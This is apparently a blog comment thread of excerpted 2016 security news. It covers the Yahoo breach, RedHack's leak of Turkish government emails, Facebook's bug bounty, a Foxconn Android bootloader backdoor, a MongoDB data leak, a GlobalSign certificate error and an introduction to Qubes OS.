The deal between Verizon and Yahoo is currently expected to close in the first quarter. Verizon said that the burden is on Yahoo to prove that the breach hasn’t damaged its value.”We’re looking to Yahoo to demonstrate to us the full impact they believe it’s not,” Silliman said. If Verizon concludes the breach had a material impact on Yahoo’s business, then a key condition of the deal would not be met, he said. Analysts say that could trigger an escape clause in the agreement to allow the telecom company to back out of the deal.
Yahoo said it discovered the breach, the largest recorded in history, in August. The firm said it occurred in 2014 and affected at least 500 million user accounts.
Tomi Engdahl says:
Efe Kerem Sozeri / The Daily Dot:
How hacktivist group RedHack subverted the Turkish government’s notorious censorship tactics in order to release a government email archive
How hacktivist group RedHack gamed Turkey’s censorship regime
http://www.dailydot.com/layer8/redhack-gamed-turkey-censorship/
The Turkish government’s plan to hide a massive email leak completely backfired.
The Turkish government blocked Google Drive, Dropbox, OneDrive and even Github to stop leaked emails of Energy Minister, Berat Albayrak, from spreading further—exactly how the hackers behind the email leak expected them to react, allowing them to spread the leak further using the Streisand Effect.
The Daily Dot previously reported that the Marxist hacktivist group, RedHack, has compromised the private email accounts of Minister Albayrak—Turkish President Recep Tayyip Erdoğan’s son-in-law—and leaked the 17GB email archive to a group of journalists, including the Daily Dot.
Two days ago, when Cemil Uğur, a reporter from the leftist daily Evrensel, was imprisoned for “making propaganda an illegal organisation,” RedHack threatened to leak the email archive publicly if Uğur and other jailed reporters are not released within a day. After the deadline, the group followed through its threat.
To overcome the Turkish government’s notorious censorship, the hacker group diversified sources, including with links on StackOverflow profiles and in the deep halls of the Internet Archive —prompting the Turkish government to ban them all one by one, including blocking the “archive.org” domain and banning access to the Wayback Machine along the way.
But RedHack said they have calculated the most impact by uploading the torrent file to the GitHub, forcing the Turkish government into a hard choice between blocking the world’s biggest source-code repository or facing the fact that the leak will be available to the public.
Within four hours of the leak, Turkey’s internet authority decided to issue a nationwide block on GitHub, which was lifted approximately 18 hours later—a period long enough to make headlines all around the world. Meanwhile, the content that RedHack uploaded on the GitHub was not removed at all; instead, the group is now uploading screenshots of emails to further circumvent Turkey’s censorship.
The ban on Google Drive was also lifted after 15 hours despite the re-uploaded torrent file still being accessible. The block on Dropbox has also been lifted.
While the Google Drive access problems halted many corporate services inside Turkey, the block on GitHub had collateral damages for the general public as well. For example, websites using Font Awesome were not displaying their content properly, and MacOS package manager system Homebrew was reportedly not working.
(“After cloud-based systems, #github is also blocked. Is this a joke? If we are trying to wipe out start-ups, we are on the right track”)
At the end of the day, all of Turkey’s blocking attempts to stop the world’s leading cloud services seemed to be in vain, as RedHack kept sharing the torrent file and magnet link that points to the 10.9GB compressed (.rar) archive of the email dump on all possible platforms, which was then downloaded and seeded by hundreds of people inside Turkey and abroad.
Turkish government’s increasing control of the domestic media is rightfully concerning. But its attempts to control the online world is evidently a failure when groups such as RedHack know how to turn the tables.
Tomi Engdahl says:
Facebook’s un-Liked ~900 security flaws in five years
The Social Network™ has slung more than US$5m to bounty hunters
http://www.theregister.co.uk/2016/10/14/facebook_bug_bounty_squashes_900_falws/
Facebook has paid security researchers US$5million in five years, after they found vulnerabilities in its platforms and quietly disclosed them under its bug bounty program.
The Social Network™ runs a well oiled bounty program and pays generously when it receives notice of flaws and working proof-of-concepts, provided they are not already public or used in attacks against users.
Security engineer Joey Tyson says the money went to about 900 researchers with an average payout of US$5,556.
“Launching and running a program of this size for five years is not easy, and we couldn’t have done it without the support of the broader security research community,” Tyson says.
Tomi Engdahl says:
‘Pork Explosion’ flaw splatters Foxconn’s Android phones
Full compromise over USB bacon-ed in to smartmobes
http://www.theregister.co.uk/2016/10/14/pork_explosion_foxconn_flaw/
Security researcher John Sawyer says a limited backdoor has been found in some Foxconn-manufactured Android phones, allowing attackers to root phones they have in hand.
The backdoor is the result if a debugging function left over in Foxconn apps bootloader code which can be exploited by attackers wielding appropriate software.
Sawyer badges the vulnerability a result of “great neglect” by Foxconn.
Those attackers will have complete control over the devices having bypassed SELinux Android security controls, and gained access without the need of authentication.
The vulnerability, dubbed “Pork Explosion” (a salvo to over-hyped flaws bearing names, websites, and logos), is most useful to forensics boffins wanting to pull data from the unspecified list of affected handsets in which the low level Foxconn code exists.
Tomi Engdahl says:
Modern Business Solutions Stumbles Over A Modern Business Problem – 58M Records Dumped From An Unsecured Database
https://www.riskbasedsecurity.com/2016/10/modern-business-solutions-stumbles-over-a-modern-business-problem-58m-records-dumped-from-an-unsecured-database/
Much has been written about the dangers of poorly secured MongoDB databases among others. Despite the many warnings, millions of records have been lost due to misconfigurations in this database software. Now we have yet another massive database leak has been uncovered related to an insecure MongoDB installation, exposing at least 58 million subscriber records.
Twitter user @0x2Taylor posted exfiltrated data on the file sharing site MEGA twice over the weekend, each time resulting in the data being taken down very quickly. The data was then released for a third time on a smaller file sharing website. After analyzing the dataset, we can confirm that nearly 58 million records contain full names, IP addresses, dates of birth, email addresses, vehicle data, and occupations were included in the leak.
While the data itself is easy enough to read, identifying the owner of the database has been more challenging. Nothing within the dumped dataset itself pointed to who might be responsible for the information.
researchers were able to confirm it was an open MongoDB installation and identify the owner as Modern Business Solutions. Working with Databreaches.net, Modern Business Solutions was contacted and made aware of the issue. Although neither RBS or Databreaches.net have yet received a reply from Modern Business Solutions, the database has since been secured and is no longer accessible.
Wait, 58M Records Or 258M?!
Shortly after discovering the ownership, our researchers received a curious update from 0x2Taylor. New information emerged indicating an additional table had been identified, containing 258 million rows of personal data. The data was presented in a similar format as the original leak
It is unclear how much data from this second table may have been compromised
Putting The Breach In Context
There have been 2,928 publicly disclosed data breaches so far this year, exposing more than 2.2 billion records. While 2.2 billion is a big number, RBS research indicates 55% of the breaches taking place in the first half of 2016 exposed 10,000 or less records. Unfortunately, some of the most notable “mega-breach” exceptions have come from misconfigured databases. With so much media attention given to mysterious “Russian hackers” or the more general “state sponsored actors”, it can be easy to lose sight of the fact some of the largest and most damaging breaches have nothing to do with the nebulous “advanced persistent threat”. Rather, they can be attributed to weak controls, poor management practices or under-resourced staff.
Tomi Engdahl says:
GlobalSign Error Causes Widespread Internet Issues
https://it.slashdot.org/story/16/10/13/192239/globalsign-error-causes-widespread-internet-issues
GlobalSign, one of the root CAs globally, has ‘inadvertently revoked its intermediary certificates while updating a special cross-certificate. This smashed the chain of trust and ultimately nullified sites’ SSL/TLS certificates. It could take days to fix, leaving folks unable to easily read their favorite webpages.’ The issue may take up to four days to resolve itself.
GlobalSign screw-up cancels top websites’ HTTPS certificates
Revoked certs may linger for days, locking people out of sites
http://www.theregister.co.uk/2016/10/13/globalsigned_off/
GlobalSign’s efforts as a root certificate authority have gone TITSUP this afternoon – that’s a total inability to support usual protocols.
The result is that many websites big and small have had their HTTPS certificates incorrectly scrapped, meaning that for some people their browsers no longer trust websites and refuse or are reluctant to access them.
Specifically, it appears GlobalSign inadvertently triggered the revocation of its intermediary certificates while updating a special cross-certificate. This smashed the chain of trust and ultimately nullified SSL/TLS certificates issued by GlobalSign to its customers. It could take days to fix, leaving folks unable to easily read their favorite webpages.
Tomi Engdahl says:
Secure Desktops with Qubes: Introduction
http://www.linuxjournal.com/content/secure-desktops-qubes-introduction
This is the first in a multipart series on Qubes OS, a security-focused operating system that is fundamentally different from any other Linux desktop I’ve ever used
When it comes to Linux security, server security tends to get the most attention. When you are hardening servers, you generally try to limit what any individual server does and use firewalls to restrict access between servers to only what is necessary. In a modern environment where a server is running only SSH plus maybe one or two other networked services, there are only a few ways for an attacker to get in. If a particular server does get hacked, ideally you can detect it, isolate that server and respond to the emergency while the rest of your environment stays up.
Desktop Linux security is a completely different challenge because of just how many different things you do with your desktop. Each action you take with your desktop computer opens up a new way to be compromised. Web browsing, especially if you still have certain risky plugins like Flash installed, is one major way a desktop can be compromised. E-mail is another popular attack vector since you need to open only one malicious e-mail attachment or click on one malicious phishing link for an attack to succeed. Linux desktops also often are used as development platforms, which means users might be downloading, building and executing someone else’s code or running services directly on their desktop to test out their own code. Although some Linux users are smug when they think about all of the malware on other platforms, the fact is that the days when Windows was the only desktop OS in town are over, and these days, much of the malware is written in a cross-platform way so that it can run on many different operating systems.
The biggest issue with desktop Linux security is what’s at risk if you do get hacked: all of your personal data. This could be anything from user names and passwords to important accounts like your bank or credit-card accounts, your social-media accounts, your domain registrar or Web sites you shopped at in the past that have your credit-card data cached.
Attackers could leave behind a Remote Access Trojan that lets them get back into your machine whenever they want, and in the meantime, they could snoop on you with your Webcam and microphone. They even could compromise your SSH, VPN and GPG keys, which opens up access to other computers.
The core idea behind how Qubes provides security is an approach called security by compartmentalization. This approach focuses on limiting the damage an attacker can do by separating your activities and their related files to separate virtual machines (VMs). You then assign each VM a certain level of trust based on the level of risk that VM presents. For instance, you may create an untrusted VM that you use for your generic, unauthenticated Web browsing. You then might have a separate, more-trusted VM that you use only to access your bank.
Secure Desktops with Qubes: Compartmentalization
http://www.linuxjournal.com/content/secure-desktops-qubes-compartmentalization?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+linuxjournalcom+%28Linux+Journal+-+The+Original+Magazine+of+the+Linux+Community%29
When you first start using Qubes, you may not be quite sure how best to divide up all of your files and activities into separate VMs.
In this article, I describe how I organize my activities into VMs on my personal computer. Although I’m not saying my approach is perfect, and I certainly could secure things even further than I do, I at least will provide you one example you can use to get started.